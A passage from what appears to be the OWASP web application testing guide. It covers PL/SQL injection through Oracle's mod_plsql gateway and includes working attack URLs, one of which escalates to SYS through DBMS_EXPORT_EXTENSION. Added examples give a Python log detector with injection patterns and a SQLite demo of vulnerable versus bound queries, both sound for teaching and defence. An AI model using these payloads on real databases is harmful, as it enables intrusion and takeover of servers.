4.0
118 Web Application Penetration Testing

PORTAL.WWV_HTP.CENTERCLOSE
ORASSO.HOME
WWC_VERSION.GET_HTTP_DATABASE_INFO
An attacker should pick one of these functions that is actually available on the target system (i.e., returns a 200 OK when requested). As a test, an attacker can request

http://server.example.com/pls/dad/orasso.home?FOO=BAR

The server should return a "404 File Not Found" response because the orasso.home procedure does not require parameters and one has been supplied. However, before the 404 is returned, the following PL/SQL is executed:

..
..
if ((owa_match.match_pattern('orasso.home', simple_list__, complex_list__, true))) then
  rc__ := 2;
else
  null;
  orasso.wpg_session.init();
  orasso.home(FOO=>:FOO);
..
..

Note the presence of FOO in the attacker's query string. Attackers can abuse this to run arbitrary SQL. First, they need to close the brackets:

http://server.example.com/pls/dad/orasso.home?);--=BAR

This results in the following PL/SQL being executed:

..
orasso.home();--=>:);--);
..

Note that everything after the double minus (--) is treated as a comment. This request will cause an internal server error because one of the bind variables is no longer used, so the attacker needs to add it back. As it happens, it's this bind variable that is the key to running arbitrary PL/SQL. For the moment, they can just use HTP.PRINT to print BAR, and add the needed bind variable as :1:

http://server.example.com/pls/dad/orasso.home?);HTP.PRINT(:1);--=BAR

This should return a 200 with the word "BAR" in the HTML. What's happening here is that everything after the equals sign (BAR in this case) is the data inserted into the bind variable. Using the same technique it's possible to also gain access to owa_util.cellsprint again:

http://www.example.com/pls/dad/orasso.home?);OWA_UTIL.CELLSPRINT(:1);--=SELECT+USERNAME+FROM+ALL_USERS

To execute arbitrary SQL, including DML and DDL statements, the attacker inserts an execute immediate :1:

http://server.example.com/pls/dad/orasso.home?);execute%20immediate%20:1;--=select%201%20from%20dual

Note that the output won't be displayed. This can be leveraged to exploit any PL/SQL injection bugs owned by SYS, thus enabling an attacker to gain complete control of the backend database server.
For example, the following URL takes advantage of the SQL injection flaws in DBMS_EXPORT_EXTENSION (see http://secunia.com/advisories/19860):

http://www.example.com/pls/dad/orasso.home?);execute%20immediate%20:1;--=DECLARE%20BUF%20VARCHAR2(2000);%20BEGIN%20BUF:=SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('INDEX_NAME','INDEX_SCHEMA','DBMS_OUTPUT.PUT_LINE(:p1);EXECUTE%20IMMEDIATE%20''CREATE%20OR%20REPLACE%20PUBLIC%20SYNONYM%20BREAKABLE%20FOR%20SYS.OWA_UTIL'';END;--','SYS',1,'VER',0);END;
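A defender's view of the requests described above, as an added example that is not part of the guide: a Python script that parses constructed Common Log Format lines and flags requests to a /pls/ DAD whose query string can only be read as injected PL/SQL. The gateway maps every parameter name to a named argument (orasso.home(FOO=>:FOO)), so a legitimate name must be a plain identifier; the script checks that, and also looks for the ");" closing of the call, the "--=" comment-before-bind-value pattern and the PL/SQL keywords shown on this page. Because the injected PL/SQL runs before the 404 is returned, the detector deliberately ignores the status code. The log lines, hostnames and IP addresses are constructed, and the indicator labels are this script's own.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines in Common Log Format, not real traffic. They
# replay the requests described on the page against a mod_plsql DAD.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2014:10:00:01 +0000] "GET /pls/dad/orasso.home HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2014:10:00:02 +0000] "GET /pls/dad/orasso.home?FOO=BAR HTTP/1.1" 404 210
10.0.0.9 - - [01/Jan/2014:10:00:03 +0000] "GET /pls/dad/orasso.home?);--=BAR HTTP/1.1" 500 0
10.0.0.9 - - [01/Jan/2014:10:00:04 +0000] "GET /pls/dad/orasso.home?);HTP.PRINT(:1);--=BAR HTTP/1.1" 200 320
10.0.0.9 - - [01/Jan/2014:10:00:05 +0000] "GET /pls/dad/orasso.home?);execute%20immediate%20:1;--=select%201%20from%20dual HTTP/1.1" 404 210
10.0.0.7 - - [01/Jan/2014:10:00:06 +0000] "GET /pls/bookstore/books.search?author=DICKENS HTTP/1.1" 200 4096
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)

# The gateway turns each parameter name into a PL/SQL named argument
# (orasso.home(FOO=>:FOO)), so a legitimate name must be a plain identifier.
IDENT_RE = re.compile(r'^[A-Za-z][A-Za-z0-9_$#]*$')

# Keywords that appear in the injected PL/SQL described on the page.
KEYWORD_RE = re.compile(
    r'execute\s+immediate|owa_util\.|htp\.|dbms_export_extension', re.IGNORECASE)


def parse_line(line):
    """Split one log line into ip, path, raw query string and status."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    path, _, query = m.group('target').partition('?')
    return {'ip': m.group('ip'), 'path': path, 'query': query,
            'status': int(m.group('status'))}


def analyse_query(query):
    """Return the list of injection indicators found in a raw query string."""
    decoded = unquote_plus(query)
    indicators = []
    for pair in decoded.split('&'):
        name = pair.partition('=')[0]
        if name and not IDENT_RE.match(name):
            indicators.append('parameter name is not an identifier')
            break
    if re.search(r'\)\s*;', decoded):
        indicators.append('procedure call closed with );')
    if re.search(r'--\s*=', decoded):
        indicators.append('comment marker before the bind value (--=)')
    kw = KEYWORD_RE.search(decoded)
    if kw:
        indicators.append('keyword ' + kw.group(0).lower())
    return indicators


def find_gateway_injection(log_text):
    """Return every /pls/ request carrying at least one indicator, whatever its
    status code: the injected PL/SQL has already run by the time the 404 is sent."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not rec['path'].lower().startswith('/pls/'):
            continue
        indicators = analyse_query(rec['query'])
        if indicators:
            hits.append(dict(rec, indicators=indicators))
    return hits


if __name__ == '__main__':
    for hit in find_gateway_injection(SAMPLE_LOG):
        print(hit['status'], hit['ip'], hit['path'] + '?' + hit['query'])
        for ind in hit['indicators']:
            print('   -', ind)
```

Run against the sample, the script flags the three requests from 10.0.0.9 (statuses 500, 200 and 404) and leaves the plain orasso.home?FOO=BAR probe and the bookstore search alone; the 404 hit is the one a status-code-only rule would have missed.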
Assessing Custom PL/SQL Web Applications

During black box security assessments, the code of the custom PL/SQL application is not available, but it still needs to be assessed for security vulnerabilities.

Testing for SQL Injection

Each input parameter should be tested for SQL injection flaws. These are easy to find and confirm. Finding them is as easy as embedding a single quote into the parameter and checking for error responses (which include 404 Not Found errors). Confirming the presence of SQL injection can be performed using the concatenation operator.

For example, assume there is a bookstore PL/SQL web application that allows users to search for books by a given author:

http://www.example.com/pls/bookstore/books.search?author=DICKENS

If this request returns books by Charles Dickens, but

http://www.example.com/pls/bookstore/books.search?author=DICK'ENS

returns an error or a 404, then there might be a SQL injection flaw. This can be confirmed by using the concatenation operator:
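The single-quote and concatenation checks described in this section, as an added example that is not part of the guide: a Python model of the bookstore search over a constructed in-memory SQLite table. One version builds the statement by string concatenation (the same defect as PL/SQL that splices a parameter into an EXECUTE IMMEDIATE string) and one uses a bind variable. The "||" concatenation operator is common to Oracle and SQLite, so the three test values behave as they would against the real application; the table contents, function names and the "error" classification (which mod_plsql would surface as a 404) are this example's own assumptions.

```python
import sqlite3

# Constructed catalogue standing in for the bookstore's table.
BOOKS = [
    ('Great Expectations', 'DICKENS'),
    ('Bleak House', 'DICKENS'),
    ('Emma', 'AUSTEN'),
]


def make_db():
    conn = sqlite3.connect(':memory:')
    conn.execute('CREATE TABLE books (title TEXT, author TEXT)')
    conn.executemany('INSERT INTO books VALUES (?, ?)', BOOKS)
    return conn


def search_vulnerable(conn, author):
    # The input is spliced into the statement text, the same mistake as PL/SQL
    # that concatenates a parameter into an EXECUTE IMMEDIATE string.
    sql = "SELECT title FROM books WHERE author = '" + author + "' ORDER BY title"
    return [row[0] for row in conn.execute(sql)]


def search_hardened(conn, author):
    # Bind variable: the input is passed as data and cannot alter the statement.
    sql = "SELECT title FROM books WHERE author = ? ORDER BY title"
    return [row[0] for row in conn.execute(sql, (author,))]


def probe(search, conn, author):
    """Send one test value and record what a black-box tester observes:
    a result set, or an error (which mod_plsql reports as a 404)."""
    try:
        return ('ok', search(conn, author))
    except sqlite3.Error as exc:
        return ('error', str(exc))


def run_black_box(search, conn, author='DICKENS'):
    """The three requests from the text: baseline, single quote, concatenation."""
    head, tail = author[:4], author[4:]
    return {
        'baseline': probe(search, conn, author),
        'quote': probe(search, conn, head + "'" + tail),
        'concat': probe(search, conn, head + "'||'" + tail),
    }


def looks_injectable(results):
    """Injection is confirmed only when the quote breaks the statement AND the
    concatenation repairs it, returning exactly the baseline rows."""
    baseline, quote, concat = results['baseline'], results['quote'], results['concat']
    return (baseline[0] == 'ok' and baseline[1] != []
            and quote[0] == 'error' and concat == baseline)


if __name__ == '__main__':
    conn = make_db()
    for name, search in (('vulnerable', search_vulnerable),
                         ('hardened', search_hardened)):
        results = run_black_box(search, conn)
        verdict = 'injectable' if looks_injectable(results) else 'not injectable'
        print(name, verdict, results)
```

The concatenation step is what separates a real injection flaw from plain input validation: against the vulnerable search, DICK'ENS raises a syntax error while DICK'||'ENS returns the same Dickens titles as the baseline, whereas the hardened search answers both with an empty, error-free result.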